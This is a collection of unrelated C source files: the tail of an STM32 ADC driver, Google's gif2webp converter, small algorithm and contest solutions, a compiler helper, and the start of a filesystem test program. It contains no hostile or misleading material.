updated afterwards with a unitary function * and potentially with ADC in a different state than disabled, * refer to description of each function for setting * conditioned to ADC state. * @note After using this function, other features must be configured * using LL unitary functions. * The minimum configuration remaining to be done is: * - Set ADC group injected sequencer: * map channel on the selected sequencer rank. * Refer to function @ref LL_ADC_INJ_SetSequencerRanks(). * - Set ADC channel sampling time * Refer to function LL_ADC_SetChannelSamplingTime(); * @param ADCx ADC instance * @param ADC_INJ_InitStruct Pointer to a @ref LL_ADC_INJ_InitTypeDef structure * @retval An ErrorStatus enumeration value: * - SUCCESS: ADC registers are initialized * - ERROR: ADC registers are not initialized */ ErrorStatus LL_ADC_INJ_Init(ADC_TypeDef *ADCx, LL_ADC_INJ_InitTypeDef *ADC_INJ_InitStruct) { ErrorStatus status = SUCCESS; /* Check the parameters */ assert_param(IS_ADC_ALL_INSTANCE(ADCx)); assert_param(IS_LL_ADC_INJ_TRIG_SOURCE(ADC_INJ_InitStruct->TriggerSource)); assert_param(IS_LL_ADC_INJ_SEQ_SCAN_LENGTH(ADC_INJ_InitStruct->SequencerLength)); if(ADC_INJ_InitStruct->SequencerLength != LL_ADC_INJ_SEQ_SCAN_DISABLE) { assert_param(IS_LL_ADC_INJ_SEQ_SCAN_DISCONT_MODE(ADC_INJ_InitStruct->SequencerDiscont)); } assert_param(IS_LL_ADC_INJ_TRIG_AUTO(ADC_INJ_InitStruct->TrigAuto)); /* Note: Hardware constraint (refer to description of this function): */ /* ADC instance must be disabled. */ if(LL_ADC_IsEnabled(ADCx) == 0U) { /* Configuration of ADC hierarchical scope: */ /* - ADC group injected */ /* - Set ADC group injected trigger source */ /* - Set ADC group injected sequencer length */ /* - Set ADC group injected sequencer discontinuous mode */ /* - Set ADC group injected conversion trigger: independent or */ /* from ADC group regular */ /* Note: On this STM32 serie, ADC trigger edge is set when starting */ /* ADC conversion. */ /* Refer to function @ref LL_ADC_INJ_StartConversionExtTrig(). */ if(ADC_INJ_InitStruct->SequencerLength != LL_ADC_REG_SEQ_SCAN_DISABLE) { MODIFY_REG(ADCx->CR1, ADC_CR1_JDISCEN | ADC_CR1_JAUTO , ADC_INJ_InitStruct->SequencerDiscont | ADC_INJ_InitStruct->TrigAuto ); } else { MODIFY_REG(ADCx->CR1, ADC_CR1_JDISCEN | ADC_CR1_JAUTO , LL_ADC_REG_SEQ_DISCONT_DISABLE | ADC_INJ_InitStruct->TrigAuto ); } MODIFY_REG(ADCx->CR2, ADC_CR2_JEXTSEL | ADC_CR2_JEXTEN , (ADC_INJ_InitStruct->TriggerSource & ADC_CR2_JEXTSEL) ); /* Note: Hardware constraint (refer to description of this function): */ /* Note: If ADC instance feature scan mode is disabled */ /* (refer to ADC instance initialization structure */ /* parameter @ref SequencersScanMode */ /* or function @ref LL_ADC_SetSequencersScanMode() ), */ /* this parameter is discarded. */ LL_ADC_INJ_SetSequencerLength(ADCx, ADC_INJ_InitStruct->SequencerLength); } else { /* Initialization error: ADC instance is not disabled. */ status = ERROR; } return status; } /** * @brief Set each @ref LL_ADC_INJ_InitTypeDef field to default value. * @param ADC_INJ_InitStruct Pointer to a @ref LL_ADC_INJ_InitTypeDef structure * whose fields will be set to default values. * @retval None */ void LL_ADC_INJ_StructInit(LL_ADC_INJ_InitTypeDef *ADC_INJ_InitStruct) { /* Set ADC_INJ_InitStruct fields to default values */ /* Set fields of ADC group injected */ ADC_INJ_InitStruct->TriggerSource = LL_ADC_INJ_TRIG_SOFTWARE; ADC_INJ_InitStruct->SequencerLength = LL_ADC_INJ_SEQ_SCAN_DISABLE; ADC_INJ_InitStruct->SequencerDiscont = LL_ADC_INJ_SEQ_DISCONT_DISABLE; ADC_INJ_InitStruct->TrigAuto = LL_ADC_INJ_TRIG_INDEPENDENT; } /** * @} */ /** * @} */ /** * @} */ #endif /* ADC1 */ /** * @} */ #endif /* USE_FULL_LL_DRIVER */ /************************ (C) COPYRIGHT STMicroelectronics *****END OF FILE****/
the_stack_data/45449636.c
#include <stdio.h> #include <stdlib.h> #include <string.h> #define ll long long #define f(i,a,b) for(ll i=a;i<b;i++) #define fd(i,b,a) for(ll i=b;i>=a;i--) int max(int x, int y) {return (x > y) ? x : y; } void lcsub(char s1[], char s2[], char s3[], int m, int n, int p) { int lcs[m+1][n+1][p+1]; f(i,0,m+1) { f(j,0,n+1) { f(k,0,p+1) { if(i == 0 || j == 0 || k == 0) lcs[i][j][k] = 0; else if(s1[i-1] == s2[j-1] && s1[i-1] == s3[k-1]) lcs[i][j][k] = lcs[i-1][j-1][k-1] + 1; else lcs[i][j][k] = max(max(lcs[i-1][j][k], lcs[i][j-1][k]), lcs[i][j][k-1]); } } } printf("%d\n",lcs[m][n][p]); int idx = lcs[m][n][p]; char res[idx + 1]; res[idx] = '\0'; int i = m, j = n, k = p; while(i > 0 && j > 0 && k > 0) { if(s1[i-1] == s2[j-1] && s1[i-1] == s3[k-1]) { res[idx-1] = s1[i-1]; idx--; i--; j--; k--; } else if(lcs[i-1][j][k] >= lcs[i][j-1][k] && lcs[i-1][j][k] >= lcs[i][j][k-1]) i--; else if(lcs[i][j-1][k] >= lcs[i-1][j][k] && lcs[i][j-1][k] >= lcs[i][j][k-1]) j--; else k--; } printf("%s\n", res); } int main() { char s1[100], s2[100], s3[100]; scanf("%s", s1); scanf("%s", s2); scanf("%s", s3); int m = strlen(s1); int n = strlen(s2); int p = strlen(s2); lcsub(s1, s2, s3, m, n, p); return 0; }
the_stack_data/573375.c
/* Public domain. */ extern double __floatsidf (long); double __floathidf (int); double __floathidf (int u) { return __floatsidf ((long)u); }
the_stack_data/113297.c
#include <stdio.h> void main() { printf("%c\n", 'x'); printf("%c\n", 2); printf("%c\n", '0'); printf("%c\n", "gg"); }
the_stack_data/93822.c
// Copyright 2012 Google Inc. All Rights Reserved. // // Use of this source code is governed by a BSD-style license // that can be found in the COPYING file in the root of the source // tree. An additional intellectual property rights grant can be found // in the file PATENTS. All contributing project authors may // be found in the AUTHORS file in the root of the source tree. // ----------------------------------------------------------------------------- // // simple tool to convert animated GIFs to WebP // // Authors: Skal ([email protected]) // Urvang ([email protected]) #include <assert.h> #include <stdio.h> #include <stdlib.h> #include <string.h> #ifdef HAVE_CONFIG_H #include "webp/config.h" #endif #ifdef WEBP_HAVE_GIF #if defined(HAVE_UNISTD_H) && HAVE_UNISTD_H #include <unistd.h> #endif #include <gif_lib.h> #include "webp/encode.h" #include "webp/mux.h" #include "../examples/example_util.h" #include "../imageio/imageio_util.h" #include "./gifdec.h" #include "./unicode.h" #include "./unicode_gif.h" #if !defined(STDIN_FILENO) #define STDIN_FILENO 0 #endif //------------------------------------------------------------------------------ static int transparent_index = GIF_INDEX_INVALID; // Opaque by default. static const char* const kErrorMessages[-WEBP_MUX_NOT_ENOUGH_DATA + 1] = { "WEBP_MUX_NOT_FOUND", "WEBP_MUX_INVALID_ARGUMENT", "WEBP_MUX_BAD_DATA", "WEBP_MUX_MEMORY_ERROR", "WEBP_MUX_NOT_ENOUGH_DATA" }; static const char* ErrorString(WebPMuxError err) { assert(err <= WEBP_MUX_NOT_FOUND && err >= WEBP_MUX_NOT_ENOUGH_DATA); return kErrorMessages[-err]; } enum { METADATA_ICC = (1 << 0), METADATA_XMP = (1 << 1), METADATA_ALL = METADATA_ICC | METADATA_XMP }; //------------------------------------------------------------------------------ static void Help(void) { printf("Usage:\n"); printf(" gif2webp [options] gif_file -o webp_file\n"); printf("Options:\n"); printf(" -h / -help ............. this help\n"); printf(" -lossy ................. encode image using lossy compression\n"); printf(" -mixed ................. for each frame in the image, pick lossy\n" " or lossless compression heuristically\n"); printf(" -q <float> ............. quality factor (0:small..100:big)\n"); printf(" -m <int> ............... compression method (0=fast, 6=slowest)\n"); printf(" -min_size .............. minimize output size (default:off)\n" " lossless compression by default; can be\n" " combined with -q, -m, -lossy or -mixed\n" " options\n"); printf(" -kmin <int> ............ min distance between key frames\n"); printf(" -kmax <int> ............ max distance between key frames\n"); printf(" -f <int> ............... filter strength (0=off..100)\n"); printf(" -metadata <string> ..... comma separated list of metadata to\n"); printf(" "); printf("copy from the input to the output if present\n"); printf(" "); printf("Valid values: all, none, icc, xmp (default)\n"); printf(" -loop_compatibility .... use compatibility mode for Chrome\n"); printf(" version prior to M62 (inclusive)\n"); printf(" -mt .................... use multi-threading if available\n"); printf("\n"); printf(" -version ............... print version number and exit\n"); printf(" -v ..................... verbose\n"); printf(" -quiet ................. don't print anything\n"); printf("\n"); } //------------------------------------------------------------------------------ int main(int argc, const char *argv[]) { int verbose = 0; int gif_error = GIF_ERROR; WebPMuxError err = WEBP_MUX_OK; int ok = 0; const W_CHAR *in_file = NULL, *out_file = NULL; GifFileType* gif = NULL; int frame_duration = 0; int frame_timestamp = 0; GIFDisposeMethod orig_dispose = GIF_DISPOSE_NONE; WebPPicture frame; // Frame rectangle only (not disposed). WebPPicture curr_canvas; // Not disposed. WebPPicture prev_canvas; // Disposed. WebPAnimEncoder* enc = NULL; WebPAnimEncoderOptions enc_options; WebPConfig config; int frame_number = 0; // Whether we are processing the first frame. int done; int c; int quiet = 0; WebPData webp_data; int keep_metadata = METADATA_XMP; // ICC not output by default. WebPData icc_data; int stored_icc = 0; // Whether we have already stored an ICC profile. WebPData xmp_data; int stored_xmp = 0; // Whether we have already stored an XMP profile. int loop_count = 0; // default: infinite int stored_loop_count = 0; // Whether we have found an explicit loop count. int loop_compatibility = 0; WebPMux* mux = NULL; int default_kmin = 1; // Whether to use default kmin value. int default_kmax = 1; INIT_WARGV(argc, argv); if (!WebPConfigInit(&config) || !WebPAnimEncoderOptionsInit(&enc_options) || !WebPPictureInit(&frame) || !WebPPictureInit(&curr_canvas) || !WebPPictureInit(&prev_canvas)) { fprintf(stderr, "Error! Version mismatch!\n"); FREE_WARGV_AND_RETURN(-1); } config.lossless = 1; // Use lossless compression by default. WebPDataInit(&webp_data); WebPDataInit(&icc_data); WebPDataInit(&xmp_data); if (argc == 1) { Help(); FREE_WARGV_AND_RETURN(0); } for (c = 1; c < argc; ++c) { int parse_error = 0; if (!strcmp(argv[c], "-h") || !strcmp(argv[c], "-help")) { Help(); FREE_WARGV_AND_RETURN(0); } else if (!strcmp(argv[c], "-o") && c < argc - 1) { out_file = GET_WARGV(argv, ++c); } else if (!strcmp(argv[c], "-lossy")) { config.lossless = 0; } else if (!strcmp(argv[c], "-mixed")) { enc_options.allow_mixed = 1; config.lossless = 0; } else if (!strcmp(argv[c], "-loop_compatibility")) { loop_compatibility = 1; } else if (!strcmp(argv[c], "-q") && c < argc - 1) { config.quality = ExUtilGetFloat(argv[++c], &parse_error); } else if (!strcmp(argv[c], "-m") && c < argc - 1) { config.method = ExUtilGetInt(argv[++c], 0, &parse_error); } else if (!strcmp(argv[c], "-min_size")) { enc_options.minimize_size = 1; } else if (!strcmp(argv[c], "-kmax") && c < argc - 1) { enc_options.kmax = ExUtilGetInt(argv[++c], 0, &parse_error); default_kmax = 0; } else if (!strcmp(argv[c], "-kmin") && c < argc - 1) { enc_options.kmin = ExUtilGetInt(argv[++c], 0, &parse_error); default_kmin = 0; } else if (!strcmp(argv[c], "-f") && c < argc - 1) { config.filter_strength = ExUtilGetInt(argv[++c], 0, &parse_error); } else if (!strcmp(argv[c], "-metadata") && c < argc - 1) { static const struct { const char* option; int flag; } kTokens[] = { { "all", METADATA_ALL }, { "none", 0 }, { "icc", METADATA_ICC }, { "xmp", METADATA_XMP }, }; const size_t kNumTokens = sizeof(kTokens) / sizeof(*kTokens); const char* start = argv[++c]; const char* const end = start + strlen(start); keep_metadata = 0; while (start < end) { size_t i; const char* token = strchr(start, ','); if (token == NULL) token = end; for (i = 0; i < kNumTokens; ++i) { if ((size_t)(token - start) == strlen(kTokens[i].option) && !strncmp(start, kTokens[i].option, strlen(kTokens[i].option))) { if (kTokens[i].flag != 0) { keep_metadata |= kTokens[i].flag; } else { keep_metadata = 0; } break; } } if (i == kNumTokens) { fprintf(stderr, "Error! Unknown metadata type '%.*s'\n", (int)(token - start), start); Help(); FREE_WARGV_AND_RETURN(-1); } start = token + 1; } } else if (!strcmp(argv[c], "-mt")) { ++config.thread_level; } else if (!strcmp(argv[c], "-version")) { const int enc_version = WebPGetEncoderVersion(); const int mux_version = WebPGetMuxVersion(); printf("WebP Encoder version: %d.%d.%d\nWebP Mux version: %d.%d.%d\n", (enc_version >> 16) & 0xff, (enc_version >> 8) & 0xff, enc_version & 0xff, (mux_version >> 16) & 0xff, (mux_version >> 8) & 0xff, mux_version & 0xff); FREE_WARGV_AND_RETURN(0); } else if (!strcmp(argv[c], "-quiet")) { quiet = 1; enc_options.verbose = 0; } else if (!strcmp(argv[c], "-v")) { verbose = 1; enc_options.verbose = 1; } else if (!strcmp(argv[c], "--")) { if (c < argc - 1) in_file = GET_WARGV(argv, ++c); break; } else if (argv[c][0] == '-') { fprintf(stderr, "Error! Unknown option '%s'\n", argv[c]); Help(); FREE_WARGV_AND_RETURN(-1); } else { in_file = GET_WARGV(argv, c); } if (parse_error) { Help(); FREE_WARGV_AND_RETURN(-1); } } // Appropriate default kmin, kmax values for lossy and lossless. if (default_kmin) { enc_options.kmin = config.lossless ? 9 : 3; } if (default_kmax) { enc_options.kmax = config.lossless ? 17 : 5; } if (!WebPValidateConfig(&config)) { fprintf(stderr, "Error! Invalid configuration.\n"); goto End; } if (in_file == NULL) { fprintf(stderr, "No input file specified!\n"); Help(); goto End; } // Start the decoder object gif = DGifOpenFileUnicode(in_file, &gif_error); if (gif == NULL) goto End; // Loop over GIF images done = 0; do { GifRecordType type; if (DGifGetRecordType(gif, &type) == GIF_ERROR) goto End; switch (type) { case IMAGE_DESC_RECORD_TYPE: { GIFFrameRect gif_rect; GifImageDesc* const image_desc = &gif->Image; if (!DGifGetImageDesc(gif)) goto End; if (frame_number == 0) { if (verbose) { printf("Canvas screen: %d x %d\n", gif->SWidth, gif->SHeight); } // Fix some broken GIF global headers that report // 0 x 0 screen dimension. if (gif->SWidth == 0 || gif->SHeight == 0) { image_desc->Left = 0; image_desc->Top = 0; gif->SWidth = image_desc->Width; gif->SHeight = image_desc->Height; if (gif->SWidth <= 0 || gif->SHeight <= 0) { goto End; } if (verbose) { printf("Fixed canvas screen dimension to: %d x %d\n", gif->SWidth, gif->SHeight); } } // Allocate current buffer. frame.width = gif->SWidth; frame.height = gif->SHeight; frame.use_argb = 1; if (!WebPPictureAlloc(&frame)) goto End; GIFClearPic(&frame, NULL); WebPPictureCopy(&frame, &curr_canvas); WebPPictureCopy(&frame, &prev_canvas); // Background color. GIFGetBackgroundColor(gif->SColorMap, gif->SBackGroundColor, transparent_index, &enc_options.anim_params.bgcolor); // Initialize encoder. enc = WebPAnimEncoderNew(curr_canvas.width, curr_canvas.height, &enc_options); if (enc == NULL) { fprintf(stderr, "Error! Could not create encoder object. Possibly due to " "a memory error.\n"); goto End; } } // Some even more broken GIF can have sub-rect with zero width/height. if (image_desc->Width == 0 || image_desc->Height == 0) { image_desc->Width = gif->SWidth; image_desc->Height = gif->SHeight; } if (!GIFReadFrame(gif, transparent_index, &gif_rect, &frame)) { goto End; } // Blend frame rectangle with previous canvas to compose full canvas. // Note that 'curr_canvas' is same as 'prev_canvas' at this point. GIFBlendFrames(&frame, &gif_rect, &curr_canvas); if (!WebPAnimEncoderAdd(enc, &curr_canvas, frame_timestamp, &config)) { fprintf(stderr, "Error while adding frame #%d: %s\n", frame_number, WebPAnimEncoderGetError(enc)); goto End; } else { ++frame_number; } // Update canvases. GIFDisposeFrame(orig_dispose, &gif_rect, &prev_canvas, &curr_canvas); GIFCopyPixels(&curr_canvas, &prev_canvas); // Force frames with a small or no duration to 100ms to be consistent // with web browsers and other transcoding tools. This also avoids // incorrect durations between frames when padding frames are // discarded. if (frame_duration <= 10) { frame_duration = 100; } // Update timestamp (for next frame). frame_timestamp += frame_duration; // In GIF, graphic control extensions are optional for a frame, so we // may not get one before reading the next frame. To handle this case, // we reset frame properties to reasonable defaults for the next frame. orig_dispose = GIF_DISPOSE_NONE; frame_duration = 0; transparent_index = GIF_INDEX_INVALID; break; } case EXTENSION_RECORD_TYPE: { int extension; GifByteType *data = NULL; if (DGifGetExtension(gif, &extension, &data) == GIF_ERROR) { goto End; } if (data == NULL) continue; switch (extension) { case COMMENT_EXT_FUNC_CODE: { break; // Do nothing for now. } case GRAPHICS_EXT_FUNC_CODE: { if (!GIFReadGraphicsExtension(data, &frame_duration, &orig_dispose, &transparent_index)) { goto End; } break; } case PLAINTEXT_EXT_FUNC_CODE: { break; } case APPLICATION_EXT_FUNC_CODE: { if (data[0] != 11) break; // Chunk is too short if (!memcmp(data + 1, "NETSCAPE2.0", 11) || !memcmp(data + 1, "ANIMEXTS1.0", 11)) { if (!GIFReadLoopCount(gif, &data, &loop_count)) { goto End; } if (verbose) { fprintf(stderr, "Loop count: %d\n", loop_count); } stored_loop_count = loop_compatibility ? (loop_count != 0) : 1; } else { // An extension containing metadata. // We only store the first encountered chunk of each type, and // only if requested by the user. const int is_xmp = (keep_metadata & METADATA_XMP) && !stored_xmp && !memcmp(data + 1, "XMP DataXMP", 11); const int is_icc = (keep_metadata & METADATA_ICC) && !stored_icc && !memcmp(data + 1, "ICCRGBG1012", 11); if (is_xmp || is_icc) { if (!GIFReadMetadata(gif, &data, is_xmp ? &xmp_data : &icc_data)) { goto End; } if (is_icc) { stored_icc = 1; } else if (is_xmp) { stored_xmp = 1; } } } break; } default: { break; // skip } } while (data != NULL) { if (DGifGetExtensionNext(gif, &data) == GIF_ERROR) goto End; } break; } case TERMINATE_RECORD_TYPE: { done = 1; break; } default: { if (verbose) { fprintf(stderr, "Skipping over unknown record type %d\n", type); } break; } } } while (!done); // Last NULL frame. if (!WebPAnimEncoderAdd(enc, NULL, frame_timestamp, NULL)) { fprintf(stderr, "Error flushing WebP muxer.\n"); fprintf(stderr, "%s\n", WebPAnimEncoderGetError(enc)); } if (!WebPAnimEncoderAssemble(enc, &webp_data)) { fprintf(stderr, "%s\n", WebPAnimEncoderGetError(enc)); goto End; } if (!loop_compatibility) { if (!stored_loop_count) { // if no loop-count element is seen, the default is '1' (loop-once) // and we need to signal it explicitly in WebP. Note however that // in case there's a single frame, we still don't need to store it. if (frame_number > 1) { stored_loop_count = 1; loop_count = 1; } } else if (loop_count > 0 && loop_count < 65535) { // adapt GIF's semantic to WebP's (except in the infinite-loop case) loop_count += 1; } } // loop_count of 0 is the default (infinite), so no need to signal it if (loop_count == 0) stored_loop_count = 0; if (stored_loop_count || stored_icc || stored_xmp) { // Re-mux to add loop count and/or metadata as needed. mux = WebPMuxCreate(&webp_data, 1); if (mux == NULL) { fprintf(stderr, "ERROR: Could not re-mux to add loop count/metadata.\n"); goto End; } WebPDataClear(&webp_data); if (stored_loop_count) { // Update loop count. WebPMuxAnimParams new_params; err = WebPMuxGetAnimationParams(mux, &new_params); if (err != WEBP_MUX_OK) { fprintf(stderr, "ERROR (%s): Could not fetch loop count.\n", ErrorString(err)); goto End; } new_params.loop_count = loop_count; err = WebPMuxSetAnimationParams(mux, &new_params); if (err != WEBP_MUX_OK) { fprintf(stderr, "ERROR (%s): Could not update loop count.\n", ErrorString(err)); goto End; } } if (stored_icc) { // Add ICCP chunk. err = WebPMuxSetChunk(mux, "ICCP", &icc_data, 1); if (verbose) { fprintf(stderr, "ICC size: %d\n", (int)icc_data.size); } if (err != WEBP_MUX_OK) { fprintf(stderr, "ERROR (%s): Could not set ICC chunk.\n", ErrorString(err)); goto End; } } if (stored_xmp) { // Add XMP chunk. err = WebPMuxSetChunk(mux, "XMP ", &xmp_data, 1); if (verbose) { fprintf(stderr, "XMP size: %d\n", (int)xmp_data.size); } if (err != WEBP_MUX_OK) { fprintf(stderr, "ERROR (%s): Could not set XMP chunk.\n", ErrorString(err)); goto End; } } err = WebPMuxAssemble(mux, &webp_data); if (err != WEBP_MUX_OK) { fprintf(stderr, "ERROR (%s): Could not assemble when re-muxing to add " "loop count/metadata.\n", ErrorString(err)); goto End; } } if (out_file != NULL) { if (!ImgIoUtilWriteFile((const char*)out_file, webp_data.bytes, webp_data.size)) { WFPRINTF(stderr, "Error writing output file: %s\n", out_file); goto End; } if (!quiet) { if (!WSTRCMP(out_file, "-")) { fprintf(stderr, "Saved %d bytes to STDIO\n", (int)webp_data.size); } else { WFPRINTF(stderr, "Saved output file (%d bytes): %s\n", (int)webp_data.size, out_file); } } } else { if (!quiet) { fprintf(stderr, "Nothing written; use -o flag to save the result " "(%d bytes).\n", (int)webp_data.size); } } // All OK. ok = 1; gif_error = GIF_OK; End: WebPDataClear(&icc_data); WebPDataClear(&xmp_data); WebPMuxDelete(mux); WebPDataClear(&webp_data); WebPPictureFree(&frame); WebPPictureFree(&curr_canvas); WebPPictureFree(&prev_canvas); WebPAnimEncoderDelete(enc); if (gif_error != GIF_OK) { GIFDisplayError(gif, gif_error); } if (gif != NULL) { #if LOCAL_GIF_PREREQ(5,1) DGifCloseFile(gif, &gif_error); #else DGifCloseFile(gif); #endif } FREE_WARGV_AND_RETURN(!ok); } #else // !WEBP_HAVE_GIF int main(int argc, const char *argv[]) { fprintf(stderr, "GIF support not enabled in %s.\n", argv[0]); (void)argc; return 0; } #endif //------------------------------------------------------------------------------
the_stack_data/75139061.c
/** * A Different Problem: https://icpc.kattis.com/problems/different * * Write a program that computes the difference between non-negative integers. * * Input * Each line of the input consists of a pair of integers. Each integer is * between 00 and 10151015 (inclusive). The input is terminated by end of file. * * Output * For each pair of integers in the input, output one line, containing the * absolute value of their difference. */ #include <stdio.h> #include <stdlib.h> int main(int argc, char const *argv[]) { if (argc != 1) { return 1; } long long int a, b; while (! feof(stdin)) { scanf("%lld %lld", &a, &b); printf("%lld\n", llabs(a - b)); } return 0; }
the_stack_data/14730.c
#include <sys/types.h> #include <sys/mount.h> #include <sys/mman.h> #include <sys/stat.h> #include <sys/xattr.h> #include <sys/syscall.h> #include <dirent.h> #include <errno.h> #include <error.h> #include <fcntl.h> #include <stdio.h> #include <stdlib.h> #include <string.h> #include <unistd.h> int main(int argc, char *argv[]) { unsigned char v0[8192]; unsigned char v1[8192]; char v2[] = "."; char v3[] = "foo"; char v4[] = "foo/bar"; char v5[] = "foo/bar/baz"; char v6[] = "foo/bar/xattr"; char v7[] = "foo/bar/acl"; char v8[] = "foo/bar/æøå"; char v9[] = "foo/bar/fifo"; char v10[] = "foo/bar/hln"; char v11[] = "foo/bar/sln"; char v12[] = "./A"; char v13[] = "./A/foo"; char v14[] = "./A/foo2"; char v15[] = "./A/bar"; long v16; long v17; memcpy(v0, "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa